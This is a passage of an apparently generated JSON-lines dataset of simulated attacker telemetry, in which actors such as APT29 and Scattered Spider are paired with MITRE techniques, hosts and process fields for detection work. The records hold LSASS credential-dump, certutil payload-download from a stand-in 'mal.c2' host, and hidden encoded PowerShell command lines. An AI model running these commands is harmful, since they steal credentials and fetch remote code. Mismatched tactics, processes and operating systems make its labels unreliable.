Logs","timestamp":"2026-09-25T08:30:44.000Z","user":{"name":"CORP\\ullrkjlgvthn","sid":"S-1-5-21-484525482-498651769-5081"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_apt29_20250214T052137000Z_0017343","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.145.138.248","name":"WIN-FIN-SRV-WP6UU9XAJZ","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17343APT29T1566.001"},"network":{"domain":"github.com","dst_ip":"1.44.156.117","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1757 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-12-14T20:26:23.000Z","user":{"name":"azuread\\924svxwdjdie","sid":"S-1-5-21-609197726-523235315-1527"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access","Reconnaissance","Initial Access"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20260302T054519000Z_0017345","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.174.27.81","name":"EC2-INST-YH6TNKX690","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17345Scattered SpiderT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.137.6.2","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-11T22:25:01.000Z","user":{"name":"arn:aws:iam::yx9935mcmqth","sid":"S-1-5-21-898218479-309117360-7731"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance","Credential Access","Persistence"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20261017T134416000Z_0017347","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.91.110.161","name":"WIN-FIN-SRV-VL9MAZGE7Q","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17347Scattered SpiderT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.65.239.73","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-04-03T23:38:46.000Z","user":{"name":"arn:aws:iam::r60ujp7yybzs","sid":"S-1-5-21-928578357-127607820-1755"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access","Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250810T121948000Z_0017349","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.129.25.211","name":"AZURE-VM-IPMIL7ESKR","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17349Scattered SpiderT1566.001"},"network":{"domain":"github.com","dst_ip":"1.64.195.213","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-04-17T03:40:38.000Z","user":{"name":"arn:aws:iam::uwrzujdfiutz","sid":"S-1-5-21-820932775-836846660-1695"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery","Initial Access","Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20250415T184842000Z_0017351","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.236.195.216","name":"AZURE-VM-LORIKNMBFJ","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17351APT41T1003.001"},"network":{"domain":"github.com","dst_ip":"1.96.23.172","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3984 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-30T14:51:27.000Z","user":{"name":"i-3z2hy2p1zd4t","sid":"S-1-5-21-454126450-927535962-3015"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Privilege Escalation","Discovery","Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250204T122132000Z_0017353","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.19.80.242","name":"EC2-INST-NNN6BEGF4T","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17353Scattered SpiderT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.29.251.167","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-20T23:35:58.000Z","user":{"name":"svc_j5pugl7ib7c9","sid":"S-1-5-21-362607607-592796873-7307"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Command and Control","Persistence"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20250228T145344000Z_0017355","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.71.188.121","name":"IAM-ROLE-5OML1ISGT3","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17355APT41T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.112.149.126","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2102 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-08T10:44:43.000Z","user":{"name":"svc_fltgeaynzdwe","sid":"S-1-5-21-302855912-392208669-3122"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Exfiltration","Reconnaissance","Collection"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20251229T121215000Z_0017357","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.159.222.5","name":"WIN-FIN-SRV-3WX9RN17JF","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17357APT41T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.140.203.228","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 500 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-11-23T03:56:29.000Z","user":{"name":"CORP\\bt510slgkrzv","sid":"S-1-5-21-312442694-502028373-3187"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Initial Access","Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20250507T220548000Z_0017359","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.228.183.224","name":"EC2-INST-TRJF3VVTOF","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17359Scattered SpiderT1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.110.177.19","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-04-22T16:50:39.000Z","user":{"name":"azuread\\bkti68ms4lqu","sid":"S-1-5-21-918449572-917741992-8451"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Persistence"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20260522T113743000Z_0017361","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.180.198.70","name":"EC2-INST-AFQUXT44VP","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17361UNC4841T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.97.226.68","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-12T02:02:05.000Z","user":{"name":"i-4epvv4mzwoz2","sid":"S-1-5-21-590017728-334398306-2363"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20260615T201300000Z_0017363","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.169.254.90","name":"DB-ORACLE-S3RR922LC2","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17363UNC4841T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.159.238.40","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1755 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-25T15:07:44.000Z","user":{"name":"CORP\\4m9d6jo9c6tf","sid":"S-1-5-21-511927679-383366793-7514"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Collection"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20250530T175532000Z_0017365","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.142.72.48","name":"EC2-INST-782H6MO1ZB","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17365UNC4841T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.168.118.210","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-12-01T19:17:22.000Z","user":{"name":"arn:aws:iam::o3omcgp7dlv1","sid":"S-1-5-21-693431935-259445812-5565"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Collection","Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20260410T133605000Z_0017367","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.167.89.49","name":"IAM-ROLE-SP96D95TB6","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17367Mustang PandaT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.21.217.96","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1734 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-11-04T14:36:15.000Z","user":{"name":"arn:aws:iam::nogw3kp54g9x","sid":"S-1-5-21-374961820-679634885-1007"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Execution"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20261230T133215000Z_0017369","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.29.193.243","name":"DB-ORACLE-JI4RBU7S5M","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17369Mustang PandaT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.111.137.206","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-04-12T18:48:52.000Z","user":{"name":"CORP\\yfq058s12omo","sid":"S-1-5-21-266606221-887946296-7345"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion","Command and Control","Initial Access"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250730T071536000Z_0017371","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.58.20.204","name":"EC2-INST-B74YUTPLBC","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17371UNC4841T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.100.60.122","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-08T07:02:50.000Z","user":{"name":"CORP\\07jmf2mhtkc2","sid":"S-1-5-21-481727694-969225918-2048"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Command and Control","Lateral Movement","Defense Evasion"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260509T224527000Z_0017373","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.0.25.37","name":"WIN-FIN-SRV-QLC3C8J8MX","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17373UNC4841T1531"},"network":{"domain":"github.com","dst_ip":"1.182.102.2","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-04T17:41:33.000Z","user":{"name":"svc_wnqyvh9o9mxo","sid":"S-1-5-21-690314361-683481728-8938"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Discovery"],"technique_id":"T1570"},"event_id":"evt_apt29_20250217T182012000Z_0017375","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.44.47.236","name":"IAM-ROLE-29EN5ZOVON","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17375APT29T1570"},"network":{"domain":"github.com","dst_ip":"1.161.166.149","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2825 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-03-13T00:23:15.000Z","user":{"name":"i-vf2odhcp89eq","sid":"S-1-5-21-123908015-975028521-5272"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Credential Access","Initial Access","Privilege Escalation"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20251005T010653000Z_0017377","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.163.167.84","name":"DB-ORACLE-I9KDWV0309","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17377APT29T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.133.172.47","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-10T14:25:08.000Z","user":{"name":"i-okl5tam9gubc","sid":"S-1-5-21-242361131-813395713-7661"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution","Initial Access"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20251120T042535000Z_0017379","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.69.118.49","name":"EC2-INST-0D1W9SIEGX","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17379FIN7T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.175.125.43","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1159 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-24T05:32:35.000Z","user":{"name":"i-ki4bfsgsxsj2","sid":"S-1-5-21-374903415-508598763-1883"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260919T052327000Z_0017381","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.178.203.64","name":"APP-WEB-NM2W3GMG49","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17381APT29T1484.001"},"network":{"domain":"github.com","dst_ip":"1.15.71.193","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-07-14T15:22:27.000Z","user":{"name":"arn:aws:iam::v0taxsvgyety","sid":"S-1-5-21-447261911-370220924-5486"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260421T002122000Z_0017383","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.80.219.9","name":"WIN-FIN-SRV-LJY8KANO2P","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17383Volt TyphoonT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.135.148.109","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1594 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-11-11T02:12:20.000Z","user":{"name":"CORP\\eqqbdmsxmaiw","sid":"S-1-5-21-300116283-164091472-5984"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Execution","Reconnaissance","Credential Access"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20260221T102207000Z_0017385","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.87.9.247","name":"EC2-INST-739TIE2YH8","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17385Volt TyphoonT1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.115.106.144","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-08-27T03:31:51.000Z","user":{"name":"i-cfggmn2gmh10","sid":"S-1-5-21-889288679-413682193-3124"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20261225T232745000Z_0017387","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.52.225.61","name":"WIN-FIN-SRV-NMTNZ43P7J","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17387Scattered SpiderT1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.23.15.127","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2883 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-11-13T21:13:51.000Z","user":{"name":"i-41c8qpnsr4lu","sid":"S-1-5-21-517454527-746393899-4098"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20260626T142134000Z_0017389","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.166.143.240","name":"APP-WEB-JOZZ61WXF7","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17389Lapsus$T1098.004"},"network":{"domain":"github.com","dst_ip":"1.122.121.39","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc 